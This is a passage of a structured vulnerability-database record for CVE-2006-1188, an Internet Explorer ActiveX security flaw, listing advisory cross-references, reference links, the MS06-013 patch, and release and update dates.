"CVE-2006-1188" }, { "db": "CERT/CC", "id": "VU#341028" }, { "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "db": "CERT/CC", "id": "VU#939605" }, { "db": "CERT/CC", "id": "VU#876678" }, { "db": "CERT/CC", "id": "VU#434641" }, { "db": "CERT/CC", "id": "VU#234812" }, { "db": "CERT/CC", "id": "VU#641460" }, { "db": "CERT/CC", "id": "VU#824324" }, { "db": "CERT/CC", "id": "VU#984473" }, { "db": "CERT/CC", "id": "VU#680526" }, { "db": "CERT/CC", "id": "VU#740372" }, { "db": "BID", "id": "17468" }, { "db": "VULHUB", "id": "VHN-17296" }, { "db": "PACKETSTORM", "id": "45345" }, { "db": "PACKETSTORM", "id": "38386" }, { "db": "PACKETSTORM", "id": "46765" } ], "trust": 9.45 }, "exploit_availability": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "reference": "https://www.scap.org.cn/vuln/vhn-17296", "trust": 0.1, "type": "unknown" } ], "sources": [ { "db": "VULHUB", "id": "VHN-17296" } ] }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "CERT/CC", "id": "VU#824324", "trust": 3.4 }, { "db": "NVD", "id": "CVE-2006-1188", "trust": 3.0 }, { "db": "USCERT", "id": "TA06-101A", "trust": 2.6 }, { "db": "SECUNIA", "id": "18957", "trust": 2.5 }, { "db": "CERT/CC", "id": "VU#959049", "trust": 1.7 }, { "db": "VUPEN", "id": "ADV-2006-1318", "trust": 1.7 }, { "db": "SECTRACK", "id": "1015900", "trust": 1.7 }, { "db": "CERT/CC", "id": "VU#740372", "trust": 1.6 }, { "db": "CERT/CC", "id": "VU#939605", "trust": 1.6 }, { "db": "CERT/CC", "id": "VU#680526", "trust": 1.6 }, { "db": "BID", "id": "17468", "trust": 1.2 }, { "db": "CERT/CC", "id": "VU#234812", "trust": 0.9 }, { "db": "CERT/CC", "id": "VU#876678", "trust": 0.9 }, { "db": "CERT/CC", "id": "VU#984473", "trust": 0.9 }, { "db": "CERT/CC", "id": "VU#641460", "trust": 0.9 }, { "db": "CERT/CC", "id": "VU#341028", "trust": 0.9 }, { "db": "CERT/CC", "id": "VU#434641", "trust": 0.9 }, { "db": "SECUNIA", "id": "15891", "trust": 0.9 }, { "db": "SECUNIA", "id": "19583", "trust": 0.8 }, { "db": "SECUNIA", "id": "18680", "trust": 0.8 }, { "db": "SECUNIA", "id": "16373", "trust": 0.8 }, { "db": "SECUNIA", "id": "19269", "trust": 0.8 }, { "db": "SECUNIA", "id": "19606", "trust": 0.8 }, { "db": "SECUNIA", "id": "19378", "trust": 0.8 }, { "db": "BID", "id": "17181", "trust": 0.8 }, { "db": "BID", "id": "14594", "trust": 0.8 }, { "db": "XF", "id": "21895", "trust": 0.8 }, { "db": "SECTRACK", "id": "1014727", "trust": 0.8 }, { "db": "SECUNIA", "id": "16480", "trust": 0.8 }, { "db": "XF", "id": "21193", "trust": 0.8 }, { "db": "BID", "id": "14087", "trust": 0.8 }, { "db": "OSVDB", "id": "17680", "trust": 0.8 }, { "db": "SECTRACK", "id": "1014329", "trust": 0.8 }, { "db": "USCERT", "id": "SA06-101A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2006-000174", "trust": 0.8 }, { "db": "CNNVD", "id": "CNNVD-200604-164", "trust": 0.7 }, { "db": "EXPLOIT-DB", "id": "1838", "trust": 0.1 }, { "db": "VULHUB", "id": "VHN-17296", "trust": 0.1 }, { "db": "CERT/CC", "id": "VU#503124", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "45345", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "38386", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "46765", "trust": 0.1 } ], "sources": [ { "db": "CERT/CC", "id": "VU#234812" }, { "db": "CERT/CC", "id": "VU#876678" }, { "db": "CERT/CC", "id": "VU#680526" }, { "db": "CERT/CC", "id": "VU#984473" }, { "db": "CERT/CC", "id": "VU#824324" }, { "db": "CERT/CC", "id": "VU#641460" }, { "db": "CERT/CC", "id": "VU#341028" }, { "db": "CERT/CC", "id": "VU#434641" }, { "db": "CERT/CC", "id": "VU#740372" }, { "db": "CERT/CC", "id": "VU#939605" }, { "db": "VULHUB", "id": "VHN-17296" }, { "db": "BID", "id": "17468" }, { "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "db": "PACKETSTORM", "id": "45345" }, { "db": "PACKETSTORM", "id": "38386" }, { "db": "PACKETSTORM", "id": "46765" }, { "db": "CNNVD", "id": "CNNVD-200604-164" }, { "db": "NVD", "id": "CVE-2006-1188" } ] }, "id": "VAR-200604-0201", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VULHUB", "id": "VHN-17296" } ], "trust": 0.01 }, "last_update_date": "2024-11-29T21:24:21.138000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "MS06-013", "trust": 0.8, "url": "http://www.microsoft.com/technet/security/bulletin/MS06-013.mspx" }, { "title": "MS06-013", "trust": 0.8, "url": "http://www.microsoft.com/japan/technet/security/bulletin/MS06-013.mspx" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2006-000174" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "NVD-CWE-Other", "trust": 1.0 } ], "sources": [ { "db": "NVD", "id": "CVE-2006-1188" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.8, "url": "http://www.microsoft.com/technet/security/bulletin/ms06-013.mspx" }, { "trust": 2.5, "url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html" }, { "trust": 2.5, "url": "http://www.kb.cert.org/vuls/id/824324" }, { "trust": 1.7, "url": "http://www.securityfocus.com/archive/1/435096/30/4710/threaded" }, { "trust": 1.7, "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2006/ms06-013" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1144" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1290" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1296" }, { "trust": 1.7, "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a1773" }, { "trust": 1.7, "url": "http://securitytracker.com/id?1015900" }, { "trust": 1.7, "url": "http://secunia.com/advisories/18957" }, { "trust": 1.7, "url": "http://www.vupen.com/english/advisories/2006/1318" }, { "trust": 1.6, "url": "http://www.kb.cert.org/vuls/id/959049" }, { "trust": 1.6, "url": "http://www.microsoft.com/technet/security/bulletin/ms05-052.mspx" }, { "trust": 1.6, "url": "http://www.microsoft.com/technet/security/bulletin/ms05-037.mspx" }, { "trust": 1.6, "url": "about vulnerability notes" }, { "trust": 1.6, "url": "contact us about this vulnerability" }, { "trust": 1.6, "url": "provide a vendor statement" }, { "trust": 0.9, "url": "http://www.microsoft.com/technet/security/advisory/903144.mspx" }, { "trust": 0.9, "url": "http://www.sec-consult.com/184.html" }, { "trust": 0.8, "url": "http://www.microsoft.com/technet/security/bulletin/ms06-014.mspx" }, { "trust": 0.8, "url": "http://secunia.com/advisories/19583/" }, { "trust": 0.8, "url": "http://msdn.microsoft.com/archive/default.asp?url=/archive/en-us/dnarmdac/html/msdn_remtdata.asp" }, { "trust": 0.8, "url": "http://www.microsoft.com/technet/security/advisory/917077.mspx" }, { "trust": 0.8, "url": "http://secunia.com/advisories/18680/" }, { "trust": 0.8, "url": "http://blogs.technet.com/msrc/archive/2006/03/22/422849.aspx" }, { "trust": 0.8, "url": "http://msdn.microsoft.com/workshop/author/dhtml/reference/methods/createtextrange.asp" }, { "trust": 0.8, "url": "http://www.microsoft.com/com/default.mspx" }, { "trust": 0.8, "url": "http://msdn.microsoft.com/library/default.asp?url=/workshop/components/activex/activex_node_entry.asp" }, { "trust": 0.8, "url": "http://support.microsoft.com/kb/159621" }, { "trust": 0.8, "url": "http://support.microsoft.com/kb/216434" }, { "trust": 0.8, "url": "http://www.securityfocus.com/archive/1/391803" }, { "trust": 0.8, "url": "http://www.kb.cert.org/vuls/id/939605" }, { "trust": 0.8, "url": "http://www.kb.cert.org/vuls/id/740372" }, { "trust": 0.8, "url": "http://www.microsoft.com/technet/security/bulletin/ms05-054.mspx" }, { "trust": 0.8, "url": "http://www.microsoft.com/technet/security/bulletin/ms05-038.mspx" }, { "trust": 0.8, "url": "http://secunia.com/advisories/16373/" }, { "trust": 0.8, "url": "http://secunia.com/advisories/19269/" }, { "trust": 0.8, "url": "http://www.microsoft.com/technet/security/bulletin/ms06-015.mspx" }, { "trust": 0.8, "url": "http://support.microsoft.com/kb/918165" }, { "trust": 0.8, "url": "http://secunia.com/advisories/19606/" }, { "trust": 0.8, "url": "http://jeffrey.vanderstad.net/grasshopper/" }, { "trust": 0.8, "url": "http://secunia.com/advisories/19378/" }, { "trust": 0.8, "url": "http://www.securityfocus.com/bid/17181 " }, { "trust": 0.8, "url": "http://www.microsoft.com/technet/security/advisory/906267.mspx" }, { "trust": 0.8, "url": "http://www.kb.cert.org/vuls/id/680526" }, { "trust": 0.8, "url": "http://secunia.com/advisories/16480/" }, { "trust": 0.8, "url": "http://www.securityfocus.com/bid/14594" }, { "trust": 0.8, "url": "http://www.securitytracker.com/alerts/2005/aug/1014727.html" }, { "trust": 0.8, "url": "http://xforce.iss.net/xforce/xfdb/21895" }, { "trust": 0.8, "url": "http://secunia.com/advisories/15891/ " }, { "trust": 0.8, "url": "http://www.securitytracker.com/alerts/2005/jun/1014329.html" }, { "trust": 0.8, "url": "http://www.osvdb.org/displayvuln.php?osvdb_id=17680" }, { "trust": 0.8, "url": "http://www.securityfocus.com/bid/14087" }, { "trust": 0.8, "url": "http://xforce.iss.net/xforce/xfdb/21193" }, { "trust": 0.8, "url": "http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=33120" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188" }, { "trust": 0.8, "url": "http://www.frsirt.com/english/advisories/2006/1318" }, { "trust": 0.8, "url": "http://jvn.jp/cert/jvnta06-101a/index.html" }, { "trust": 0.8, "url": "http://jvn.jp/tr/trta06-101a/" }, { "trust": 0.8, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2006-1188" }, { "trust": 0.8, "url": "http://secunia.com/advisories/18957/" }, { "trust": 0.8, "url": "http://www.securityfocus.com/bid/17468" }, { "trust": 0.8, "url": "http://www.us-cert.gov/cas/alerts/sa06-101a.html" }, { "trust": 0.8, "url": "http://xforce.iss.net/xforce/alerts/id/220" }, { "trust": 0.8, "url": "http://xforce.iss.net/xforce/alerts/id/217" }, { "trust": 0.3, "url": "http://www.mozilla.com/" }, { "trust": 0.3, "url": "/archive/1/435096" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/641460\u003e" }, { "trust": 0.1, "url": "https://update.microsoft.com/microsoftupdate\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1189\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0003\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1185\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/984473\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/341028\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1388\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-0012\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/reading_room/securing_browser/#internet_ex" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/cas/signup.html\u003e." }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/234812\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/434641\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/824324\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/cas/techalerts/ta06-101a.html\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1359\u003e" }, { "trust": 0.1, "url": "http://www.microsoft.com/technet/security/bulletin/ms06-apr.mspx\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1245\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/503124\u003e" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1186\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/876678\u003e" }, { "trust": 0.1, "url": "http://www.kb.cert.org/vuls/id/959049\u003e" }, { "trust": 0.1, "url": "http://www.us-cert.gov/legal.html\u003e" }, { "trust": 0.1, "url": "http://secunia.com/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/product/10/" }, { "trust": 0.1, "url": "http://secunia.com/product/9/" }, { "trust": 0.1, "url": "http://secunia.com/product/11/" }, { "trust": 0.1, "url": "http://secunia.com/secunia_vacancies/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/15891/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html" }, { "trust": 0.1, "url": "http://en.wikipedia.org/wiki/internet_explorer" }, { "trust": 0.1, "url": "http://www.microsoft.com/windows/ie/default.mspx" }, { "trust": 0.1, "url": "http://morph3us.org/advisories/20060525-msie6-sp2-2.txt" }, { "trust": 0.1, "url": "http://www.w3.org/tr/html4/loose.dtd\"\u003e" }, { "trust": 0.1, "url": "http://buha.info/board/" }, { "trust": 0.1, "url": "http://www.microsoft.com/windows/ie/" }, { "trust": 0.1, "url": "http://morph3us.org/" }, { "trust": 0.1, "url": "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd\"\u003e" }, { "trust": 0.1, "url": "http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2006-1188" }, { "trust": 0.1, "url": "http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html" } ], "sources": [ { "db": "CERT/CC", "id": "VU#234812" }, { "db": "CERT/CC", "id": "VU#876678" }, { "db": "CERT/CC", "id": "VU#680526" }, { "db": "CERT/CC", "id": "VU#984473" }, { "db": "CERT/CC", "id": "VU#824324" }, { "db": "CERT/CC", "id": "VU#641460" }, { "db": "CERT/CC", "id": "VU#341028" }, { "db": "CERT/CC", "id": "VU#434641" }, { "db": "CERT/CC", "id": "VU#740372" }, { "db": "CERT/CC", "id": "VU#939605" }, { "db": "VULHUB", "id": "VHN-17296" }, { "db": "BID", "id": "17468" }, { "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "db": "PACKETSTORM", "id": "45345" }, { "db": "PACKETSTORM", "id": "38386" }, { "db": "PACKETSTORM", "id": "46765" }, { "db": "CNNVD", "id": "CNNVD-200604-164" }, { "db": "NVD", "id": "CVE-2006-1188" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#234812" }, { "db": "CERT/CC", "id": "VU#876678" }, { "db": "CERT/CC", "id": "VU#680526" }, { "db": "CERT/CC", "id": "VU#984473" }, { "db": "CERT/CC", "id": "VU#824324" }, { "db": "CERT/CC", "id": "VU#641460" }, { "db": "CERT/CC", "id": "VU#341028" }, { "db": "CERT/CC", "id": "VU#434641" }, { "db": "CERT/CC", "id": "VU#740372" }, { "db": "CERT/CC", "id": "VU#939605" }, { "db": "VULHUB", "id": "VHN-17296" }, { "db": "BID", "id": "17468" }, { "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "db": "PACKETSTORM", "id": "45345" }, { "db": "PACKETSTORM", "id": "38386" }, { "db": "PACKETSTORM", "id": "46765" }, { "db": "CNNVD", "id": "CNNVD-200604-164" }, { "db": "NVD", "id": "CVE-2006-1188" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#234812" }, { "date": "2006-03-23T00:00:00", "db": "CERT/CC", "id": "VU#876678" }, { "date": "2005-08-19T00:00:00", "db": "CERT/CC", "id": "VU#680526" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#984473" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#824324" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#641460" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#341028" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#434641" }, { "date": "2005-08-18T00:00:00", "db": "CERT/CC", "id": "VU#740372" }, { "date": "2005-07-02T00:00:00", "db": "CERT/CC", "id": "VU#939605" }, { "date": "2006-04-11T00:00:00", "db": "VULHUB", "id": "VHN-17296" }, { "date": "2006-04-11T00:00:00", "db": "BID", "id": "17468" }, { "date": "2007-04-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "date": "2006-04-12T04:12:55", "db": "PACKETSTORM", "id": "45345" }, { "date": "2005-07-01T23:31:00", "db": "PACKETSTORM", "id": "38386" }, { "date": "2006-05-29T07:36:29", "db": "PACKETSTORM", "id": "46765" }, { "date": "2006-04-11T00:00:00", "db": "CNNVD", "id": "CNNVD-200604-164" }, { "date": "2006-04-11T23:02:00", "db": "NVD", "id": "CVE-2006-1188" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2006-11-02T00:00:00", "db": "CERT/CC", "id": "VU#234812" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#876678" }, { "date": "2007-10-11T00:00:00", "db": "CERT/CC", "id": "VU#680526" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#984473" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#824324" }, { "date": "2006-05-15T00:00:00", "db": "CERT/CC", "id": "VU#641460" }, { "date": "2006-04-11T00:00:00", "db": "CERT/CC", "id": "VU#341028" }, { "date": "2006-04-12T00:00:00", "db": "CERT/CC", "id": "VU#434641" }, { "date": "2005-10-13T00:00:00", "db": "CERT/CC", "id": "VU#740372" }, { "date": "2005-07-12T00:00:00", "db": "CERT/CC", "id": "VU#939605" }, { "date": "2018-10-18T00:00:00", "db": "VULHUB", "id": "VHN-17296" }, { "date": "2006-05-26T19:48:00", "db": "BID", "id": "17468" }, { "date": "2007-04-01T00:00:00", "db": "JVNDB", "id": "JVNDB-2006-000174" }, { "date": "2021-07-27T00:00:00", "db": "CNNVD", "id": "CNNVD-200604-164" }, { "date": "2024-11-21T00:08:15.770000", "db": "NVD", "id": "CVE-2006-1188" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-200604-164" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "RDS.Dataspace ActiveX control bypasses ActiveX security model", "sources": [ { "db": "CERT/CC", "id": "VU#234812" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-200604-164" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.